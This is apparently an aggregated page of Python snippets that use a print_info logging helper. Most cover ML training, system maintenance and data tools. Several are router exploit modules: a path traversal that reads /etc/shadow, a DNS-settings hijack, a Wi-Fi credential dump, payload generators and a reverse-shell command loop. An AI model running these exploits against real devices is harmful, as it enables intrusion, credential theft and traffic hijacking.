Example #1
def main():
    if not args.comments:
        raise errors.BadInputError("A comment describing/motivating " \
                    "the replacement must be provided!")

    # Connect to the database
    db = database.Database()
    db.connect()
    
    trans = db.begin() # Open a DB transaction
    try:
        verify_replacement(args.obsolete_id, args.replacement, db)
        replace_id = load_rawfile.load_rawfile(args.replacement, db)
        replace_rawfile(args.obsolete_id, replace_id, \
                            args.comments, db)
        utils.print_info("Successfully marked rawfile (ID: %d) and " \
                        "being superseded by a new rawfile (ID: %d)" % \
                        (args.obsolete_id, replace_id), 1)
    except:
        db.rollback()
        raise
    else:
        db.commit()
    finally:
        # Close DB connection
        db.close()
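Every example on this page logs through a small family of print helpers (print_info, print_success, print_warning, print_failed, print_error, and friends). The projects differ in their exact signatures; a minimal sketch of what these snippets assume (the verbosity threshold and color codes here are illustrative guesses, not any one project's implementation) could be:

import sys

VERBOSITY = 1  # assumed global verbosity threshold

def print_info(msg, level=0):
    # Print an informational message when the verbosity level allows it.
    if level <= VERBOSITY:
        print(msg)

def print_success(msg):
    print("\033[92m[+]\033[0m {}".format(msg))    # green tag

def print_warning(msg):
    print("\033[93m[!]\033[0m {}".format(msg))    # yellow tag

def print_failed(msg):
    print("\033[91m[-]\033[0m {}".format(msg))    # red tag

def print_error(msg):
    sys.stderr.write("[ERROR] {}\n".format(msg))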
Example #2
    def run(self, host, port, timeout):
        filename = input('Please input filename (default: /etc/shadow): ')
        if filename == '':
            filename = '/etc/shadow'

        url = "{}:{}/cgi-bin/webproc".format(host, port)
        data = {
            "getpage": "html/index.html",
            "*errorpage*": "../../../../../../../../../../..{}".format(filename),
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "******",
            "%3Apassword": "******",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh"
        }

        # connection
        response, err = self.http_post(self.s, url, timeout, data)
        if err:
            self.print_requests_err(host, port, err)
            return

        if response.status_code == 200:
            utils.print_success("Exploit success")
            utils.print_info("File: {}".format(filename))
            utils.print_info(response.text)
        else:
            utils.print_failed("Exploit failed")
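The exploit snippets route HTTP through `self.http_get` / `self.http_post` wrappers that return a `(response, error)` pair instead of raising. A minimal sketch consistent with the call sites (the implementation itself is an assumption):

import requests

def http_get(session, url, timeout):
    # GET through a shared requests.Session; never raises, returns (resp, err).
    try:
        return session.get(url, timeout=timeout), None
    except requests.RequestException as err:
        return None, err

def http_post(session, url, timeout, data):
    # POST form data the same way.
    try:
        return session.post(url, data=data, timeout=timeout), None
    except requests.RequestException as err:
        return None, err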
Example #3
    def login(self, host, port, timeout):
        url = 'http://{}:{}/'.format(host, port)
        resp, err = self.http_get(self.s, url, timeout)
        if err:
            self.print_requests_err(host, port, err)
            return False

        utils.print_info('"Retrieving random login token..."')
        token = self.regx_grab(resp.text, r'Frm_Logintoken"\)\.value = "(.*)";', 1)
        if token:
            utils.print_info(
                "Trying to log in with credentials {} : {}".format(self.username, self.password))
            url = 'http://{}:{}/'.format(host, port)
            data = {"Frm_Logintoken": token,
                    "Username": self.username,
                    "Password": self.password,
                    "action": "login"}
            resp, err = self.http_post(self.s, url, timeout, data)
            if err:
                utils.print_warning('{}:{} request error, msg: {}'.format(host, port, type(err).__name__))
                return False
            if "Username" not in resp.text and "Password" not in resp.text:
                utils.print_success("Successful authentication")
                return True
            else:
                return False
        else:
            utils.print_warning('Cannot find the login token')
            return False
Example #4
def flatpak() -> None:
    if os.path.exists("/usr/bin/flatpak"):
        print_info("Updating Flatpak apps")
        # Flatpak may return a non-zero exit code even when it's capable of installing the updates.
        run(["flatpak", "update"], check=False)
    else:
        print_info("flatpak not found")
Example #5
def trim() -> None:
    if os.path.exists("/sbin/fstrim"):
        print_info("Running fstrim")
        run(["fstrim", "-a", "-v"], sudo=True)
        # run(["fstrim", "/", "-v"])
    else:
        print_info("fstrim not found")
Example #6
  def _build_encoder(self):
    """Construct encoder network: placeholders, operations, optimizer"""
    self._input = tf.placeholder(tf.float32, self._batch_shape, name='input')
    self._encoding = tf.placeholder(tf.float32, (FLAGS.batch_size, self.layer_narrow), name='encoding')

    # NOTE: this fully-connected encoder is built and then immediately
    # discarded; the convolutional encoder below overwrites self._encode.
    self._encode = (pt.wrap(self._input)
                    .flatten()
                    .fully_connected(self.layer_encoder, name='enc_hidden')
                    .fully_connected(self.layer_narrow, name='narrow'))

    self._encode = pt.wrap(self._input)
    self._encode = self._encode.conv2d(5, 32, stride=2)
    print(self._encode.get_shape())
    self._encode = self._encode.conv2d(5, 64, stride=2)
    print(self._encode.get_shape())
    self._encode = self._encode.conv2d(5, 128, stride=2)
    print(self._encode.get_shape())
    self._encode = (self._encode.dropout(0.9).
                    flatten().
                    fully_connected(self.layer_narrow, activation_fn=None))

    # variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.encoder_scope)
    self._encoder_loss = self._encode.l1_regression(pt.wrap(self._encoding))
    ut.print_info('new learning rate: %.8f (%f)' % (FLAGS.learning_rate/FLAGS.batch_size, FLAGS.learning_rate))
    self._opt_encoder = self._optimizer(learning_rate=FLAGS.learning_rate/FLAGS.batch_size)
    self._train_encoder = self._opt_encoder.minimize(self._encoder_loss)
Example #7
  def train(self, epochs_to_train=5):
    meta = self.get_meta()
    ut.print_time('train started: \n%s' % ut.to_file_name(meta))
    ut.configure_folders(FLAGS, meta)

    self.fetch_datasets(self._activation)
    self.build_model()
    self._register_training_start()

    with tf.Session() as sess:
      sess.run(tf.initialize_all_variables())
      self._saver = tf.train.Saver()

      if FLAGS.load_state and os.path.exists(self.get_checkpoint_path()):
        self._saver.restore(sess, self.get_checkpoint_path())
        ut.print_info('Restored requested. Previous epoch: %d' % self.get_past_epochs(), color=31)

      # MAIN LOOP
      for current_epoch in xrange(epochs_to_train):
        start = time.time()
        feed = self._get_epoch_dataset()
        for _, batch in enumerate(feed):

          encoding, reconstruction, loss, _, _ = sess.run(
            [self._encode, self._decode, self._reco_loss, self._train, self._step],
            feed_dict={self._input: batch[0], self._reconstruction: batch[0]})
          self._register_batch(loss)
        self._register_epoch(current_epoch, epochs_to_train, time.time()-start, sess)
      self._writer = tf.train.SummaryWriter(FLAGS.logdir, sess.graph)
      meta = self._register_training()
    return meta, self._stats['epoch_accuracy']
Example #8
def pretrain():
    utils.print_info("Start pretraining...")
    for epoch in range(args.pre_train_epoch):
        start_time, loss, n = time.time(), 0., 0
        for x, _ in real_dataloader:
            x = x.to(device)

            pre_gen_optimizer.zero_grad()
            x_features = vgg_net(x)
            gen_x = gen_net(x)
            gen_x_features = vgg_net(gen_x)

            c_loss = con_loss(gen_x_features, x_features.detach())
            c_loss.backward()
            pre_gen_optimizer.step()

            loss += c_loss.item()
            n += 1

        print("Epoch: {:3d}, con_loss: {:3.3f}, time: {:3.3f} secs".format(
            epoch + 1, loss / n,
            time.time() - start_time))
    generator_image(pretrain_outputs_path, 5)
    save_pth("gen")
    utils.print_info("Pretrain done.")
Example #9
def list_whitelisted_jurisdictions():
    jurisdictions = utils.get_jurisdictions()
    utils.print_info("Whitelisted jurisdictions")
    for jurisdiction in jurisdictions:
        if jurisdiction["whitelisted"]:
            print(jurisdiction['name_long'])
    return jurisdictions
Example #10
def get_input_name(input_folder):
  splitter = '/img/' if '/img/' in input_folder else '/dep/'
  main_part = input_folder.split(splitter)[0]
  name = main_part.split('/')[-1]
  name = name.replace('.tar.gz', '')
  ut.print_info('input folder: %s -> %s' % (input_folder.split('/'), name))
  return name
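For instance, with a hypothetical path (shown only to illustrate the splitting; assumes the module's `ut` helper is available):

# '/data/runs/set42.tar.gz/img/train' -> main_part '/data/runs/set42.tar.gz'
# -> last component 'set42.tar.gz' -> 'set42'
assert get_input_name('/data/runs/set42.tar.gz/img/train') == 'set42'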
Example #11
    def show(self):
        utils.print_help('Target info:')
        i = 0
        x = PrettyTable()
        x.field_names = ['index', 'host', 'port', 'brand', 'alternative', 'affective']
        for target in self.__targets:
            x.add_row([i, target.host, target.port, target.brand, target.alternative_exploit, target.affective_exploit])
            i += 1
        utils.print_info(x)

        if self.get_current():
            utils.print_help('Current: ', end='')
            utils.print_info(str(self.get_current().host))
        utils.print_help('Threads: ', end='')
        utils.print_info(str(self.__threads))
        utils.print_help('Timeout: ', end='')
        utils.print_info(str(self.__timeout))
        utils.print_help('Output: ', end='')
        utils.print_info(None if not self.__output else self.__output)
Example #12
def launch_seishub_server(debug=False):
    """
    Launches the SeisHub instance, loops until the startup sequence is finished
    and returns the process object.

    :param debug: If debug is True, the output will not be caught.
    """
    print_info("Starting SeisHub Server...")

    if debug is True:
        proc = subprocess.Popen(os.path.join(BIN_DIR, "debug.sh"), shell=True)
    else:
        proc = subprocess.Popen(os.path.join(BIN_DIR, "debug.sh"), shell=True,
                stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    # Ping the server for up to ten seconds. This should assure it has started.
    t = time.time()
    while (time.time() - t) < 10.0:
        try:
            urllib2.urlopen(BASE_URL).read()
            break
        except Exception, e:
            if hasattr(e, "code"):
                break
            time.sleep(0.25)
Example #13
    def do_result(self, *args):
        x = PrettyTable()
        x.field_names = ['host', 'port', 'brand', 'module', 'extra', 'exploit']
        for result in self.last_result:
            x.add_row(result)

        utils.print_info(x)
Example #14
    def _data(self):
        print_info('==> Preparing data..')
        transform_train = transforms.Compose([
            transforms.RandomCrop(32, padding=4),
            transforms.RandomHorizontalFlip(),
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465),
                                 (0.2023, 0.1994, 0.2010))
        ])
        transform_test = transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465),
                                 (0.2023, 0.1994, 0.2010))
        ])

        train_set = torchvision.datasets.CIFAR10(self.root_path,
                                                 train=True,
                                                 download=True,
                                                 transform=transform_train)
        _train_loader = torch.utils.data.DataLoader(train_set,
                                                    batch_size=self.batch_size,
                                                    shuffle=True,
                                                    num_workers=2)

        test_set = torchvision.datasets.CIFAR10(self.root_path,
                                                train=False,
                                                download=True,
                                                transform=transform_test)
        _test_loader = torch.utils.data.DataLoader(test_set,
                                                   batch_size=100,
                                                   shuffle=False,
                                                   num_workers=2)

        return _train_loader, _test_loader
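A quick smoke test of the returned loaders (the shapes follow from CIFAR-10's 32x32 RGB images; `trainer` is a hypothetical instance of the surrounding class):

train_loader, test_loader = trainer._data()
images, labels = next(iter(train_loader))
print(images.shape)   # torch.Size([batch_size, 3, 32, 32])
print(labels.shape)   # torch.Size([batch_size])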
Example #15
    def train(self, epoch, change_lr=False):
        print()
        print_info('Epoch: %d' % epoch)

        if change_lr:
            self._change_lr(epoch)

        self.net.train()
        train_loss = 0
        correct = 0
        total = 0
        for batch_idx, (inputs, targets) in enumerate(self.train_loader):
            inputs, targets = inputs.to(self.device), targets.to(self.device)
            self.optimizer.zero_grad()
            outputs = self.net(inputs)
            loss = self.criterion(outputs, targets)
            loss.backward()
            self.optimizer.step()

            train_loss += loss.item()
            _, predicted = outputs.max(1)
            total += targets.size(0)
            correct += predicted.eq(targets).sum().item()
        print_info('Loss: %.3f | Acc: %.3f%% (%d/%d)' %
                   (train_loss / len(self.train_loader),
                    100. * correct / total, correct, total))
Example #16
    def run(self):
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            with open(self.filepath, 'w+') as f:
                print_status("Building ELF payload")
                content = self.generate_elf(data)
                print_success("Saving file {}".format(self.filepath))
                f.write(content)
        elif self.output == "c":
            print_success("Bulding payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError(
                "No such option as {}".format(self.output)
            )
Example #17
def clean_hot_bins(ar, thresh=2.0):
    subintdata = get_subints(ar, remove_prof=True)
    subintweights = get_subint_weights(ar).astype(bool)

    # re-disperse archive because subintdata is at DM=0
    orig_dm = ar.get_dispersion_measure()
    ar.set_dispersion_measure(0)
    ar.dedisperse()

    # Clean hot bins
    for isub, subintweight in enumerate(subintweights):
        if subintweight:
            # Identify hot bins
            subint = subintdata[isub, :]
            hot_bins = get_hot_bins(subint, normstat_thresh=thresh)[0]
            utils.print_info(
                "Cleaning %d bins in subint# %d" % (len(hot_bins), isub), 2)
            if len(hot_bins):
                clean_subint(ar, isub, hot_bins)
        else:
            # Subint is masked. Nothing to do.
            pass

    # Re-dedisperse data using original DM
    ar.set_dispersion_measure(orig_dm)
    ar.dedisperse()
Example #18
    def run(self, host, port, timeout):
        # TODO: not tested yet
        if self.primary_dns == '':
            p_dns = input('Please input the PRIMARY DNS: ')
            if utils.valid_host(p_dns):
                self.primary_dns = p_dns
            else:
                self.run(host, port, timeout)

        if self.second_dns == '':
            s_dns = input('Please input the SECOND DNS: ')
            if utils.valid_host(s_dns):
                self.second_dns = s_dns
            else:
                self.run(host, port, timeout)

        utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(
            self.primary_dns, self.second_dns))
        if self.input_to_continue():
            url = "http://{}:{}/ddnsmngr.cmd?action=apply&service=0&enbl=0&" \
                  "dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" \
                .format(host, port, self.primary_dns, self.second_dns)
            resp, err = self.http_post(self.s, url, timeout, None)
            if err:
                self.print_requests_err(host, port, err)
                return
            if resp.status_code == 200:
                utils.print_success("DNS settings has been changed")
            else:
                utils.print_failed("Could not change DNS settings")
        else:
            self.primary_dns = ''
            self.second_dns = ''
Example #19
def table1_exp1(folds_dir):
    utils.print_success("Experiment 1 in Table 1")
    fn_gts = "groundtruths/database1.csv"
    gts = utils.read_groundtruths(fn_gts)
    res_files = [
        name for name in os.listdir(folds_dir)
        if os.path.isfile(os.path.join(folds_dir, name)) and "results" in name
    ]
    acc = []
    f1 = []
    for res in res_files:
        predictions = []
        groundtruths = []
        preds = read_preds(folds_dir + res)
        for name in preds:
            name_gts = name.split(".")[0]
            if name_gts in gts:
                groundtruths.append(gts[name_gts])
                predictions.append(preds[name])
        acc.append(accuracy_score(groundtruths, predictions))
        predictions = [1 if i == "s" else 0 for i in predictions]
        groundtruths = [1 if i == "s" else 0 for i in groundtruths]
        f1.append(f1_score(groundtruths, predictions, average='binary'))
    # Print average ± standard deviation
    utils.print_info("Accuracy " + str(sum(acc) / float(len(acc))) + " ± " +
                     str(stdev(acc)))
    utils.print_info("F-Measure " + str(sum(f1) / float(len(f1))) + " ± " +
                     str(stdev(f1)))
    dir_res = utils.create_dir("stats/")
    with open(dir_res + "table1_accuracy.csv", "a") as filep:
        for val in acc:
            filep.write("SVMBFF," + str(val) + "\n")
    with open(dir_res + "table1_f1.csv", "a") as filep:
        for val in f1:
            filep.write("SVMBFF," + str(val) + "\n")
Example #20
def lp_svrg_baseline(d, model):
    w_tilde = None
    g_tilde = None

    for epoch in range(0, d.num_epochs):
        if epoch % d.T == 0:
            w_tilde = np.copy(model.lin_layer.weight.data())
            cost = model.forward(d.x_train, d.y_train)
            model.backward()
            g_tilde = np.copy(model.lin_layer.weight.offset_grad)

        cost = 0
        for batch_index in range(0, d.num_batches):
            x, y = d.get_data(batch_index)

            w_offset = np.copy(model.lin_layer.weight.offset)
            np.copyto(model.lin_layer.weight.offset, w_tilde)

            model.forward_lp(x, y)
            model.backward_lp()
            w_tilde_grad = np.copy(model.lin_layer.weight.offset_grad)

            np.copyto(model.lin_layer.weight.offset, w_offset)
            cost += model.forward_lp(x, y)
            model.backward_lp()
            model.step_svrg_lp(w_tilde_grad, g_tilde)

        predY = model.predict(d.x_test)
        utils.print_info(epoch, cost / d.num_batches,
                         100 * np.mean(predY == d.y_test))
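For reference, `step_svrg_lp` presumably applies the standard SVRG variance-reduced update (this is textbook SVRG, not code taken from the repo): the step direction is the minibatch gradient at the current weights, minus the minibatch gradient at the snapshot w_tilde, plus the full-data snapshot gradient g_tilde.

# Sketch of the update: w <- w - lr * (grad_batch(w) - grad_batch(w_tilde) + g_tilde)
def svrg_step(w, grad_w, grad_w_tilde, g_tilde, lr):
    return w - lr * (grad_w - grad_w_tilde + g_tilde)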
Example #21
    def run(self, host, port, timeout):
        if self.check(host, port, timeout):
            t = prettytable.PrettyTable()
            t.field_names = ['Username', 'Password']
            for c in self.info:
                t.add_row([c[0], c[1]])
            utils.print_info(t)
Example #22
    def check(self, host, port, timeout):
        utils.print_info('Use username: {}, password: {}'.format(self.username, self.password))
        if self.input_to_continue():
            if self.login(host, port, timeout):
                url = self.check_url.format(host, port)
                resp, err = self.http_get(self.s, url, timeout)
                if err:
                    self.print_requests_err(host, port, err)
                    self.print_check_result(False, host)
                else:
                    textarea_1_match = re.compile(r'textarea cols="" rows="" class="textarea_1"', re.S).search(resp.text)
                    if textarea_1_match:
                        self.print_check_result(True, host)
                        return True
                    else:
                        utils.print_warning('Device is busy, please wait')
                        return False
            else:
                utils.print_failed('Login failed')
                self.print_check_result(False, host)
                return False
        else:
            self.set_credits()
            return self.check(host, port, timeout)

        return False
Example #23
    def start(self):
        """
        Start processing the log file.
        """
        print_info(f"Start monitoring {self.log_file}")
        with open(self.log_file) as log_file:
            reader = DictReader(log_file)

            # Keep track of the number of requests in the log window.
            request_counts = []
            while True:
                try:
                    timestamp, average_bytes, most_hit_section, count = self.read_logs(reader, self.log_interval)
                    print_info(f"{timestamp}\t{average_bytes:.2f}\t{most_hit_section}")

                    request_counts.append(count)
                    # Only keep enough counts to cover the time in the log window.
                    request_counts = request_counts[-(self.log_window // self.log_interval):]
                    requests_per_second = sum(request_counts) / self.log_window

                    # Check if the requests per second has exceeded or recovered from the traffic threshold.
                    if requests_per_second >= self.threshold and self.high_traffic is False:
                        print_error(f"High traffic generated an alert - hits = {requests_per_second:.2f} requests per "
                                    f"second, triggered at {timestamp}")
                        self.high_traffic = True
                    elif requests_per_second < self.threshold and self.high_traffic is True:
                        print_success(f"Traffic has stabilized - hits = {requests_per_second:.2f} requests per second, "
                                      f"recovered at {timestamp}")
                        self.high_traffic = False

                    # Simulate time passing. DO NOT USE for real access logs.
                    time.sleep(self.log_interval)
                except StopIteration:
                    print_warning("End of file has been reached.")
                    break
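The sliding-window arithmetic: only `log_window // log_interval` counts are kept, so summing them and dividing by `log_window` gives the average requests per second over the window. An illustrative check:

# A 120 s window sampled every 10 s keeps the last 12 counts;
# twelve 10-second counts of 150 requests each average to:
counts = [150] * 12
print(sum(counts) / 120)   # 15.0 requests per second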
Example #24
def list_blacklisted_jurisdictions():
    utils.print_info("Blacklisted jurisdictions")
    jurisdictions = utils.get_jurisdictions()
    for jurisdiction in jurisdictions:
        if not jurisdiction["whitelisted"]:
            print(jurisdiction['name_long'])
    return jurisdictions
Example #25
    def run(self, host, port, timeout):
        # TODO NOT TESTING
        if self.info is None:
            url = "http://{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase," \
                  "wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list," \
                  "get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode," \
                  "get_wps_enable,get_wps_current_time&_=1458458152703" \
                .format(host, port)

            resp, err = self.http_get(self.s, url, timeout)
            if err is None:
                if resp.status_code == 200:
                    try:
                        self.info = json.loads(resp.text)
                    except ValueError:
                        pass

        if self.info and len(self.info):
            utils.print_success('Exploit success')
            t = prettytable.PrettyTable()
            t.add_column('Key', list(self.info.keys()))
            t.add_column('Value', list(self.info.values()))
            utils.print_info(t)
            utils.logger.send((host, port, t))
            return

        utils.print_failed('Exploit failed')
Example #26
def is_funny(n):
    if n in FUNNY:
        return True
    elif n == 0 or n in UNFUNNY:
        return False
    funni = 0
    # If the number is a multiple of any funny number, add 1 funni point per funny number that it is divisible by.
    funni += len(get_divisors(n, FUNNY))
    # If the number is a multiple of any unfunny number, subtract 1 funni point per unfunny number that it is divisible by.
    funni -= len(get_divisors(n, UNFUNNY))
    # If the number is even subtract one funni point, otherwise add 1 funni point.
    if n % 2 == 0:
        funni -= 1
    else:
        funni += 1
    # If the number is prime, add 2 funni points.
    if is_prime(n):
        funni += 2
    # If the number is a perfect square, subtract 2 funni points.
    root = sqrt(n)
    if root == int(root):
        funni -= 2
        # If the number is the square of a prime, subtract another 2 funni points.
        if is_prime(int(root)):
            funni -= 2
    print_info(funni)
    return funni > 0
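`FUNNY`, `UNFUNNY`, `get_divisors`, and `is_prime` live elsewhere in that module; a plausible sketch of the two helpers (assumptions, not the original code) could be:

from math import sqrt

def get_divisors(n, candidates):
    # Members of `candidates` that evenly divide n.
    return [d for d in candidates if d != 0 and n % d == 0]

def is_prime(n):
    # Naive trial division; fine for small inputs.
    n = int(n)
    if n < 2:
        return False
    return all(n % d for d in range(2, int(sqrt(n)) + 1))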
Example #27
    def post(self):
        current_path = os.path.dirname(os.path.realpath(__file__))
        # global options
        data = Configurations.parser.parse_args()
        options = data['options']

        utils.just_write(current_path + '/storages/options.json', options, is_json=True)

        if options.get('FORCE') == "False":
            old_log = options['WORKSPACE'] + '/log.json'
            if utils.not_empty_file(old_log) and utils.reading_json(old_log):
                utils.print_info(
                    "It's already done. Use the '-f' option to force rerun the module")

                raw_activities = utils.reading_json(
                    options['WORKSPACE'] + '/log.json')
                utils.just_write(current_path + '/storages/activities.json',
                                 raw_activities, is_json=True)

                return options

        
        utils.print_info("Cleasning activities log")
        #Create skeleton activities
        commands = utils.reading_json(current_path + '/storages/commands.json')
        raw_activities = {}
        for k,v in commands.items():
            raw_activities[k] = []
        utils.just_write(current_path + '/storages/activities.json',
                         raw_activities, is_json=True)

        return options
Example #28
def get_input_name(input_folder):
    splitter = '/img/' if '/img/' in input_folder else '/dep/'
    main_part = input_folder.split(splitter)[0]
    name = main_part.split('/')[-1]
    name = name.replace('.tar.gz', '')
    ut.print_info('input folder: %s -> %s' % (input_folder.split('/'), name))
    return name
Example #29
    def run(self):
        print_status("Generating payload")
        try:
            data = self.generate()
        except OptionValidationError as e:
            print_error(e)
            return

        if self.output == "elf":
            with open(self.filepath, 'w+') as f:
                print_status("Building ELF payload")
                content = self.generate_elf(data)
                print_success("Saving file {}".format(self.filepath))
                f.write(content)
        elif self.output == "c":
            print_success("Bulding payload for C")
            content = self.generate_c(data)
            print_info(content)
        elif self.output == "python":
            print_success("Building payload for python")
            content = self.generate_python(data)
            print_info(content)
        else:
            raise OptionValidationError("No such option as {}".format(
                self.output))
Example #30
def print_data(data, fig, subplot, is_3d=True):
    colors = np.arange(0, 180)
    colors = np.concatenate((colors, colors[::-1]))
    colors = vi._duplicate_array(colors, total_length=len(data))

    if is_3d:
        subplot = fig.add_subplot(subplot, projection='3d')
        subplot.set_title('All data')
        subplot.scatter(data[:, 0],
                        data[:, 1],
                        data[:, 2],
                        c=colors,
                        cmap=plt.cm.Spectral,
                        picker=5)
    else:
        subsample = data[0:360] if len(data) < 2000 else data[0:720]
        subsample = np.concatenate(
            (subsample, subsample))[0:len(subsample) + 1]
        ut.print_info('subsample shape %s' % str(subsample.shape))
        subsample_colors = colors[0:len(subsample)]
        subplot = fig.add_subplot(subplot)
        subplot.set_title('First 360 elem')
        subplot.plot(subsample[:, 0], subsample[:, 1], picker=0)
        subplot.plot(subsample[0, 0], subsample[0, 1], picker=0)
        subplot.scatter(subsample[:, 0],
                        subsample[:, 1],
                        s=50,
                        c=subsample_colors,
                        cmap=plt.cm.Spectral,
                        picker=5)
    return subplot
Example #31
    def do_check(self, arg):
        utils.print_info('checking if module loaded')
        if not self.check_module_loaded():
            utils.print_failed(
                'checking module failed\n'
                'Please make sure you have already chosen a module')
            return

        utils.print_info('checking targets info')
        if not self.check_target_arg():
            utils.print_failed('checking targets info failed\n'
                               'Please make sure you have set the target info')
            return
        else:
            utils.print_success('checks passed...')
        target = self.task.get_current()
        if self.module.check(target.host, target.port,
                             self.task.get_timeout()):
            module_name = inspect.getmodule(self.module).__name__[16:]
            exploits = target.affective_exploit
            if not exploits:
                a_exploit = [module_name]
            else:
                if module_name not in exploits:
                    exploits.append(module_name)  # list.append returns None; mutate, then assign
                a_exploit = exploits
            self.task.set_current(
                ExploitTarget(host=target.host,
                              port=target.port,
                              brand=target.brand,
                              alternative_exploit=target.alternative_exploit,
                              affective_exploit=a_exploit))
Example #32
def experiment_2():
    utils.print_success("Experiment 2")
    groundtruths_file = "groundtruths/database2.csv"
    dir_pred = "predictions/"
    predictions_files = os.listdir(dir_pred)
    gts = read_item_tag(groundtruths_file)
    for pred_file in predictions_files:
        algo_name = pred_file.split("/")[-1][:-4]
        utils.print_info(algo_name)
        if "Ghosal" in algo_name:
            # Change threshold as RANSAC does not produce predictions in [0;1]
            threshold = 0.
        else:
            threshold = 0.5
        test_groundtruths = []
        predictions = []
        with open(dir_pred + pred_file, "r") as filep:
            for line in filep:
                row = line[:-1].split(",")
                isrc = row[0]
                if isrc in gts:
                    test_groundtruths.append(gts[isrc]) 
                    predictions.append("s" if float(row[1]) > threshold else "i")
        results_experiment_2(algo_name, predictions, test_groundtruths)

    algo_name = "Random"
    utils.print_info(algo_name)
    test_groundtruths = ["s", ] * test_groundtruths.count("s") + ["i", ] * test_groundtruths.count("i")
    predictions = ["s", "i", ] * int(len(test_groundtruths)/2)
    if len(test_groundtruths) % 2:
        predictions += ["s"]
    results_experiment_2(algo_name, predictions, test_groundtruths)
Example #33
    def _build_encoder(self):
        """Construct encoder network: placeholders, operations, optimizer"""
        self._input = tf.placeholder(tf.float32,
                                     self._batch_shape,
                                     name='input')
        self._encoding = tf.placeholder(tf.float32,
                                        (FLAGS.batch_size, self.layer_narrow),
                                        name='encoding')

        # NOTE: this fully-connected encoder is built and then immediately
        # discarded; the convolutional encoder below overwrites self._encode.
        self._encode = (pt.wrap(self._input).flatten().fully_connected(
            self.layer_encoder,
            name='enc_hidden').fully_connected(self.layer_narrow,
                                               name='narrow'))

        self._encode = pt.wrap(self._input)
        self._encode = self._encode.conv2d(5, 32, stride=2)
        print(self._encode.get_shape())
        self._encode = self._encode.conv2d(5, 64, stride=2)
        print(self._encode.get_shape())
        self._encode = self._encode.conv2d(5, 128, stride=2)
        print(self._encode.get_shape())
        self._encode = (self._encode.dropout(0.9).flatten().fully_connected(
            self.layer_narrow, activation_fn=None))

        # variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.encoder_scope)
        self._encoder_loss = self._encode.l1_regression(pt.wrap(
            self._encoding))
        ut.print_info(
            'new learning rate: %.8f (%f)' %
            (FLAGS.learning_rate / FLAGS.batch_size, FLAGS.learning_rate))
        self._opt_encoder = self._optimizer(learning_rate=FLAGS.learning_rate /
                                            FLAGS.batch_size)
        self._train_encoder = self._opt_encoder.minimize(self._encoder_loss)
Example #34
def shell(exploit, architecture="", method="", **params):
    while True:
        cmd = input("cmd > ")

        if cmd in ["quit", "exit"]:
            return

        c = cmd.split()
        if len(c) and c[0] == "reverse_tcp":
            if len(c) == 3:
                lhost = c[1]
                lport = c[2]

                revshell = ReverseShell(exploit, architecture, lhost, lport)

                if method == "wget":
                    revshell.wget(binary=params['binary'],
                                  location=params['location'])
                elif method == "echo":
                    revshell.echo(binary=params['binary'],
                                  location=params['location'])
                elif method == "awk":
                    revshell.awk(binary=params['binary'])
                elif method == "netcat":
                    revshell.netcat(binary=params['binary'],
                                    shell=params['shell'])
                else:
                    print_failed("Reverse shell is not available")
            else:
                print_failed("reverse_tcp <reverse ip> <port>")
        else:
            print_info(exploit.execute(cmd))
Example #35
def main():
    # Collect input files
    infiles = set(args.infiles)
    for glob_expr in args.glob_exprs:
        infiles.update(glob.glob(glob_expr))
    infiles = list(infiles)

    if not infiles:
        sys.stderr.write("You didn't provide any files to load. " \
                         "You should consider including some next time...\n")
        sys.exit(1)
    
    # Enter information in rawfiles table
    # create diagnostic plots and metrics.
    # Also fill-in raw_diagnostics and raw_diagnostic_plots tables
    for fn in infiles:
        try:
            if config.cfg.verbosity:
                print "Checking %s (%s)" % (fn, utils.give_utc_now())

            # Check the file and parse the header
            params = utils.prep_file(fn)
            
            # Find where the file will be moved to.
            destdir = utils.get_archive_dir(fn, params=params)
            
            utils.print_info("%s will get archived to %s (%s)" % \
                        (fn, destdir, utils.give_utc_now()), 1)

            utils.print_info("Finished with %s - pre-check successful (%s)" % \
                        (fn, utils.give_utc_now()), 1)

        except errors.ToasterError, msg:
            sys.stderr.write("Pre-check of %s failed!\n%s\nSkipping...\n" % \
                                (fn, msg))
Example #36
def get_next_batch(batch_size):
    """批量处理训练

    通过测试发现,多进程和多线程的情况下,速度并没有更快

    :param batch_size: 验证码数量
    :type batch_size int

    :return batch_x
    :rtype batch_x numpy.ndarray

    :return batch_y
    :rtype batch_y numpy.ndarray
    """
    batch_x = np.zeros([batch_size, IMAGE_HEIGHT * IMAGE_WIDTH])
    batch_y = np.zeros([batch_size, MAX_CAPTCHA * CHAR_SET_LEN])
    for i in range(batch_size):
        text, file_path, image = wrap_gen_captcha_text_and_image()

        # Delete the generated captcha file
        os.remove(file_path)

        if i % 10 == 0:
            print_info("\ngenerate captcha: {}".format(text), newline=False)
        else:
            print_info(text, newline=False)
        image = convert2gray(image)

        batch_x[
            i, :] = image.flatten() / 255  # or (image.flatten()-128)/128 for zero mean
        batch_y[i, :] = text2vec(text)

    return batch_x, batch_y
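`convert2gray` and `text2vec` come from the same tutorial module; a common definition of the grayscale helper (an assumption here) simply averages the color channels:

import numpy as np

def convert2gray(img):
    # Collapse an RGB captcha image to a single grayscale channel.
    if img.ndim > 2:
        return np.mean(img, axis=-1)
    return img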
Example #37
def svrg_bitcentering(d, model):
    g_tilde = None
    cost = 0
    for epoch in range(0, d.num_epochs):
        if epoch % d.T == 0:
            model.recenter()
